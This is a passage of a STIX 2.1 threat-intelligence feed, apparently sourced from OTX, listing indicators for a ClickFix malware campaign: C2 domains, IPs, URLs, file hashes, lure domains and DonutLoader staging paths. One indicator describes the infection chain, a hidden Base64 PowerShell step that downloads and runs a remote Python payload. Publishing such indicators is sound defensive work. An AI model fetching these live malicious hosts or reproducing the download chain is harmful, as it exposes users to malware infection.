      "id": "indicator--36bb8cf5-67ab-48c0-8f8e-de3e1351072a",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://www.kamisisterbrofanydodf.com/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-13T05:03:02.000Z",
      "description": "",
      "id": "indicator--145f5897-db17-444a-8ac4-596a85010f8a",
      "labels": [],
      "modified": "2026-05-13T05:03:02.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://www.kamisisterbrofanydodf.com/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-13T05:03:02.000Z"
    },
    {
      "created": "2026-05-17T05:03:06.000Z",
      "description": " / MD5 of 2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810",
      "id": "indicator--bba01ec8-09b4-4b45-9839-49aa9e2794d0",
      "labels": [],
      "modified": "2026-05-17T05:03:06.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.MD5 = '51b46342163ef37f5f41c269ffb337d3']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:03:06.000Z"
    },
    {
      "created": "2026-05-17T05:03:06.000Z",
      "description": "compromised_site_redirector_fromcharcode / MD5 of 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9",
      "id": "indicator--c21db930-ca9b-415f-b15e-7ca72f0f4c83",
      "labels": [],
      "modified": "2026-05-17T05:03:06.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.MD5 = '7c268bfab0653cdca45b4dc3c1ee0092']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:03:06.000Z"
    },
    {
      "created": "2026-05-17T05:03:06.000Z",
      "description": " / SHA1 of 2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810",
      "id": "indicator--892e567a-7e3c-4c79-82fb-d43479c9defa",
      "labels": [],
      "modified": "2026-05-17T05:03:06.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.'SHA-1' = '724a8445c5c3fd57778d82f62b9d4a6112a3bb2d']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:03:06.000Z"
    },
    {
      "created": "2026-05-17T05:03:06.000Z",
      "description": "compromised_site_redirector_fromcharcode / SHA1 of 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9",
      "id": "indicator--9ac38a2c-47a8-45f3-b787-7fa8bd44a6c7",
      "labels": [],
      "modified": "2026-05-17T05:03:06.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.'SHA-1' = 'f1542a7697e04865e1dfeeed084e5ea5870100f0']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:03:06.000Z"
    },
    {
      "created": "2026-05-17T05:03:06.000Z",
      "description": "",
      "id": "indicator--56babd21-17c0-40c7-aa35-16a8d0c21746",
      "labels": [],
      "modified": "2026-05-17T05:03:06.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.'SHA-256' = '2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:03:06.000Z"
    },
    {
      "created": "2026-05-17T05:03:06.000Z",
      "description": "",
      "id": "indicator--9f5f01e7-52a5-4698-aeb0-b0e00800b723",
      "labels": [],
      "modified": "2026-05-17T05:03:06.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.'SHA-256' = '2f515997ab1c7f5ab94a46041ad2af06031a842469b65bcbd2c64bd47f12a896']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:03:06.000Z"
    },
    {
      "created": "2026-05-17T05:03:06.000Z",
      "description": "",
      "id": "indicator--952a3aef-a9f6-42fe-88ae-e4d3108ae35f",
      "labels": [],
      "modified": "2026-05-17T05:03:06.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.'SHA-256' = '6d0f2cd8b853c64182986d2dcaefe5df9fe9b53220774f99dcfd9f09add3540d']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:03:06.000Z"
    },
    {
      "created": "2026-05-17T05:03:06.000Z",
      "description": "compromised_site_redirector_fromcharcode",
      "id": "indicator--7b666298-3fd5-4a19-bb97-e186932067c2",
      "labels": [],
      "modified": "2026-05-17T05:03:06.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.'SHA-256' = '88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:03:06.000Z"
    },
    {
      "created": "2026-05-17T05:04:59.000Z",
      "description": "secondary payload download / Execution chain: WScript.exe ? rundll32.exe (shell32.dll ShellExec_RunDLL) ? PowerShell (Base64-encoded, hidden window) ? downloads python312x64.zip (~14.5 MB) from https://3004.filemail.com/api/file/get?filekey=SfG1eQcm_8_zdIesRkVjDKsLLPGn3bfOiftAwlv4LtkdRlpJPaW4FoAJi5w ? extracts to %APPDATA%\\Templates\\python312x64\\ ? executes pythonw.exe with Protected.py",
      "id": "indicator--bc0c82d6-78d4-46b4-b4f5-5211dc4a162e",
      "labels": [
        "command_and_control"
      ],
      "modified": "2026-05-17T05:04:59.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://3004.filemail.com/api/file/get?filekey=SfG1eQcm_8_zdIesRkVjDKsLLPGn3bfOiftAwlv4LtkdRlpJPaW4FoAJi5w']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-17T05:04:59.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "C2 Server Domain used in ClickFix campaigns / Omegatech SC:\nTimestamp\t                Prefix                    \tAS Path\n2026-05-17 21:11:25\t178.16.53.0/24\tAS202412",
      "id": "indicator--a9fb2885-2ced-43f6-bffc-3e25dd70fec8",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'captioto.com']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "C2 Server Domain used in ClickFix campaigns / Omegatech SC:\nTimestamp\tPrefix\tAS Path\n2026-05-17 21:27:14\t178.16.53.0/24\tAS202412",
      "id": "indicator--aaeebea5-c6a2-4405-b16f-4f47aa944d10",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'cptoptious.com']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "C2 Server Domain used in ClickFix campaigns / Omegatech SC:\nTimestamp\tPrefix\tAS Path\n2026-05-17 21:43:04\t178.16.53.0/24\tAS202412\nDomain reported to registrar 2026-05-17",
      "id": "indicator--e4d987d5-8aea-4b61-b23b-0a791ec872fb",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'newtdsone.shop']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--b333dc18-af92-4961-b9c5-b71b100ad399",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://cptoptious.com/jsrepo']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--2fe93e55-62c3-4841-933d-aca97e666c71",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://cptoptious.com/automail-insurtech-tax.de']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--2b5b531b-1724-4a0c-964d-0bc5d9e1c1a8",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://captioto.com/jsrepo']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--0a16e5d4-3962-4d3e-b7ce-d6a5deade0c5",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://www.captioto.com/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--7b927664-e4fc-40ac-8a2d-b00e09244e2f",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://www.captioto.com/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--fa029497-c922-41ae-9d8e-601a364cb1a6",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://www.cptoptious.com/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--7e851f21-8ce9-410e-9ade-5484401f9bb7",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://cptoptious.com/url=']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--b2b16a5d-3e31-40d7-9c47-c9f3da26e824",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://cptoptious.com/teamrepo']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--5ab6588d-7397-4440-a963-5a58c833484b",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://www.cptoptious.com/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--731d1857-f08e-4a24-b03e-fa78985fbbd7",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://cptoptious.com/jsrepo']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--a45b82dc-7b83-44dc-8d10-01a58210997e",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://cptoptious.com/captcha.html']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--6b16164a-46e8-4d1e-971c-47554082e28a",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://cptoptious.com/captcha.htm']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--2d7d0ff9-d9a8-4940-9e85-8d36f7028b62",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://www.newtdsone.shop/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T04:44:57.000Z",
      "description": "",
      "id": "indicator--74e69086-8147-449d-a832-5f3f0d0c6131",
      "labels": [],
      "modified": "2026-05-18T04:44:57.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://www.newtdsone.shop/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T04:44:57.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": " / CC=BG ASN=AS34368 zonata - natskovi & sie ltd.",
      "id": "indicator--b42da53d-df9d-4ca5-a0de-09b91c8cbd2e",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[ipv4-addr:value = '91.92.240.117']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z",
      "valid_until": "2026-06-17T18:00:00.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": " / CC=BG ASN=AS34368 zonata - natskovi & sie ltd.",
      "id": "indicator--cfec54f3-b357-41c4-97a1-2d1778ba687f",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[ipv4-addr:value = '91.92.240.121']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z",
      "valid_until": "2026-06-17T18:00:00.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "",
      "id": "indicator--60cab142-70ce-4322-aa89-3c59864ad221",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://91.92.240.117/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "",
      "id": "indicator--5f173597-57d6-4ab1-a404-104d506832a2",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'http://91.92.240.121/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "",
      "id": "indicator--8cd9f389-f944-48ce-ad1b-91503a5cd209",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://bryanexhaust.com/']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "",
      "id": "indicator--9607e332-908e-458d-8b6a-700e46ecbcb6",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://sdntds.shop/teamrepo?rnd=0.3905751823084034&ts=1779127243826']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "",
      "id": "indicator--3e470f18-8cd4-4a14-b260-0dea11907c21",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[url:value = 'https://sdntds.shop/teamrepo?rnd=0.5058000373016334']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "",
      "id": "indicator--468dcbb9-3acd-4480-8ddb-74c073a33065",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'bryanexhaust.com']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-18T18:20:11.000Z",
      "description": "",
      "id": "indicator--e58f52bc-35aa-41d3-bad0-790c83d9dfed",
      "labels": [],
      "modified": "2026-05-18T18:20:11.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[domain-name:value = 'sdntds.shop']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:20:11.000Z"
    },
    {
      "created": "2026-05-18T18:59:17.000Z",
      "description": "Payload hash / collected from bryanexhaust.com",
      "id": "indicator--9f485729-6d5b-4065-9ca8-33e648acdccf",
      "labels": [],
      "modified": "2026-05-18T18:59:17.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.MD5 = 'c43c4bfd2e1a44ef690e6801be2b4099']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:59:17.000Z"
    },
    {
      "created": "2026-05-18T18:59:17.000Z",
      "description": "Payload hash / Collected from bryanexhaust.com",
      "id": "indicator--c47d5e9a-06a2-40e0-9dcc-909314c75cdb",
      "labels": [],
      "modified": "2026-05-18T18:59:17.000Z",
      "name": "OTX pulse_name=JS Clickfix + Windows-specific multi-stage payload",
      "pattern": "[file:hashes.'SHA-256' = '4a3b036f9447151b8ca04dbdce96bf98edf8a8a8a5638c4fc1dc3b237eb30be5']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-05-18T18:59:17.000Z"
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--26a4ff55-cd69-4a45-a1e8-0ac4362588f3",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "captioto.com \u2014 Additional TDS C2",
      "description": "TDS C2 domain observed in OTX telemetry. Serves /jsrepo endpoint. Part of expanded TDS infrastructure pool.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "captioto",
        "otx-enriched"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--403e208a-e490-4d2a-aa67-5816a6ab0b73",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "cptoptious.com \u2014 Additional TDS C2",
      "description": "TDS C2 domain. Observed serving /jsrepo, /teamrepo, and /captcha.html endpoints. Also linked to automail-insurtech-tax.de redirect.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "cptoptious",
        "otx-enriched",
        "captcha-html"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--3ab7c58f-ae41-4889-a55d-aeda799089fd",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "newtdsone.shop \u2014 Additional TDS C2",
      "description": "Additional .shop TLD TDS domain consistent with ntdnewtds.shop / dnsnewtds.shop naming pattern.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "newtdsone",
        "shop-tld",
        "otx-enriched"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--3200e47c-60be-457a-a251-a2dcd0732fb4",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "bryanexhaust.com \u2014 Associated domain",
      "description": "Domain associated with the cluster per OTX telemetry. Role unclear \u2014 possible redirect/lure page.",
      "infrastructure_types": [
        "hosting-malware"
      ],
      "labels": [
        "associated-domain",
        "otx-enriched",
        "bryanexhaust"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--4928286b-2992-45fe-b9af-2ef98d9e820f",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "gettrumpmemestrendingtokens.com \u2014 Crypto/Political lure domain",
      "description": "Lure domain used by the cluster. Hosts SVG image assets for fake CAPTCHA/lure pages. Crypto-political branding ('Trump meme tokens') used as social engineering hook \u2014 suggests the cluster targets beyond cannabis sector, using viral political/crypto content as lures.",
      "infrastructure_types": [
        "phishing"
      ],
      "labels": [
        "lure-domain",
        "crypto-lure",
        "political-lure",
        "svg-assets",
        "otx-enriched"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--937bb209-fd7c-481a-9c76-736cf14c8813",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "91.92.240.117 \u2014 Additional C2 IP",
      "description": "IP associated with cluster C2 infrastructure per OTX telemetry.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "ip",
        "c2",
        "otx-enriched"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--a8742037-1ec8-433c-a173-1666c3e92b71",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "91.92.240.121 \u2014 Additional C2 IP",
      "description": "IP associated with cluster C2 infrastructure per OTX telemetry.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "ip",
        "c2",
        "otx-enriched"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--adb73ef6-b188-4241-bd90-d2cb489a439b",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Domain: captioto.com (TDS C2)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'captioto.com']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "otx-enriched",
        "domain",
        "tds-c2"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8666c93b-ff7f-4b48-8ba1-eddc05fc7c4c",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Domain: cptoptious.com (TDS C2)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'cptoptious.com']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "otx-enriched",
        "domain",
        "tds-c2"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2cb8094e-101a-4167-9105-e2c1cac4d872",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Domain: newtdsone.shop (TDS C2)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'newtdsone.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "otx-enriched",
        "domain",
        "tds-c2"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cdbf6a27-5d50-455a-a649-9cb700898b67",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Domain: bryanexhaust.com (Associated domain)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'bryanexhaust.com']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "otx-enriched",
        "domain",
        "associated-domain"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4371eacf-7fc2-41ca-9b13-293eae43f5b1",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "Domain: gettrumpmemestrendingtokens.com (Crypto/political lure)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'gettrumpmemestrendingtokens.com']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "otx-enriched",
        "domain",
        "cryptopolitical-lure"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c82abcfd-8000-45b3-80f0-04ae65ed2843",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "IP: 91.92.240.117 \u2014 Additional C2",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[ipv4-addr:value = '91.92.240.117']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "otx-enriched",
        "ip",
        "c2"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e9919288-46a7-4694-8487-cef5abc5be38",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "IP: 91.92.240.121 \u2014 Additional C2",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[ipv4-addr:value = '91.92.240.121']",
      "pattern_type": "stix",
      "valid_from": "2026-03-20T00:00:00.000Z",
      "labels": [
        "otx-enriched",
        "ip",
        "c2"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7217d17c-3685-4973-a493-b5d4f3f921e9",
      "created": "2026-03-20T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "name": "URLs: DonutLoader C2 payload paths \u2014 158.94.208.104/x7GkP2mQ9zL4/",
      "description": "DonutLoader C2 payload staging paths. Six payload variants observed: my_downloader.bin, my_l.bin, my_s.bin (likely main/loader/shellcode), student_downloader.bin, student_l.bin, student_s.bin. Naming convention suggests affiliate segmentation ('my' vs 'student' campaigns).",
      "indicator_types": [
        "malicious-activity"
